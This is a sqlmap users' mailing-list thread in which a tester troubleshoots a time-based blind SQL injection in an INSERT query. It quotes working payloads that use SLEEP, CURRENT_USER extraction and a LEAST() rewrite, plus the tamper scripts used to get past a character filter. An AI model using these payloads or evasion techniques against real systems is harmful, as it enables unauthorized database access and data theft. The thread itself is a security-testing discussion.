Haven't tried, but if it's just for the '>' character, you might wanna
try '--tamper=between'. That should get rid of the '>' character in the
payloads.
Cheers
Dennis
Am 01.06.2013 22:39, schrieb d...@alcor.se:
> Just to add a bit to this, I tried something else that I got to work.
> I changed the sqlmap payload by using LEAST(), which became this:
>
> ',(SELECT/**/1/**/AND/**/9457=IF((LEAST(ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1)),16)=16),SLEEP(5),9457)/**/)),('
>
> Is this something sqlmap can currently do?
> Or maybe there's a better solution for it?
> Or should I implement it? (never looked at the sqlmap code, but might
> be fun to start digging into).
>
> Cheers for now!
>
>
> On 2013-06-01 21:57, d...@alcor.se wrote:
>> Hey guys, I have a server at work where there's an SQLi in an INSERT,
>> but I can't prove that it's actually a threat so far due to a little
>> "filter" that replaces some input characters.
>> I crafted a little injection that injects a sleep into the insert, and
>> makes it sleep for 10 seconds, and then doesn't insert anything (due
>> to
>> a duplicate error that I made sure to get).
>>
>> The original query looks like this:
>>
>> insert into discount_phone_registry (phone_nbr,reg_date) values
>> ('111',date(now()));.
>> And the injection is in the phone_nbr, so I made the following
>> injection: 111',(SLEEP(10))),('111
>> And it then becomes: insert into discount_phone_registry
>> (phone_nbr,reg_date) values ('111',(SLEEP(10))),('111',date(now()))
>> So, so far so good, right?
>>
>> Well when I wanted to use sqlmap, I noticed that our filter is doing
>> some stupid things ^^
>> This is the payload from sqlmap
>>
>> 111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))>16),SLEEP(5),9457)/**/)),('
>>
>> But as it gets submitted in the form, it becomes
>>
>> 111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))_16),SLEEP(5),9457)/**/)),('
>>
>> Notice how the > became a _
>> The tampering scripts I'm using are space2comment and charencode, and
>> charencode actually seems to trick it, since I'm getting the
>> less/grater
>> char in the error output from the web server now.
>> If I copy/paste the payload directly from the web server error output,
>> directly into the MySQL client and run it, it works.
>>
>> Is there anything else I can try to get this to work?
>>
>> PS: If it helps I just noticed this!
>>
>> 1064 - You have an error in your SQL syntax; check the manual that
>> corresponds to your MySQL server version for the right syntax to use
>> near ';16),SLEEP(5),9457)/**/)),('',date(now()))' at line 1
>> insert into discount_phone_registry (phone_nbr,reg_date) values
>> ('111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))<16),SLEEP(5),9457)/**/)),('',date(now()))
>>
>> Notice how it complains on ";16" which is probably the encoded > sign
>> (>).
>>
>> Thanks in advance! :-)
>>
>>
>>
>>
>> ------------------------------------------------------------------------------
>> Get 100% visibility into Java/.NET code with AppDynamics Lite
>> It's a free troubleshooting tool designed for production
>> Get down to code-level detail for bottlenecks, with <2% overhead.
>> Download for free and get started troubleshooting in minutes.
>> http://p.sf.net/sfu/appdyn_d2d_ap2
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlmap-users@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> ------------------------------------------------------------------------------
> Get 100% visibility into Java/.NET code with AppDynamics Lite
> It's a free troubleshooting tool designed for production
> Get down to code-level detail for bottlenecks, with <2% overhead.
> Download for free and get started troubleshooting in minutes.
> http://p.sf.net/sfu/appdyn_d2d_ap2
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
------------------------------------------------------------------------------
Get 100% visibility into Java/.NET code with AppDynamics Lite
It's a free troubleshooting tool designed for production
Get down to code-level detail for bottlenecks, with <2% overhead.
Download for free and get started troubleshooting in minutes.
http://p.sf.net/sfu/appdyn_d2d_ap2
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
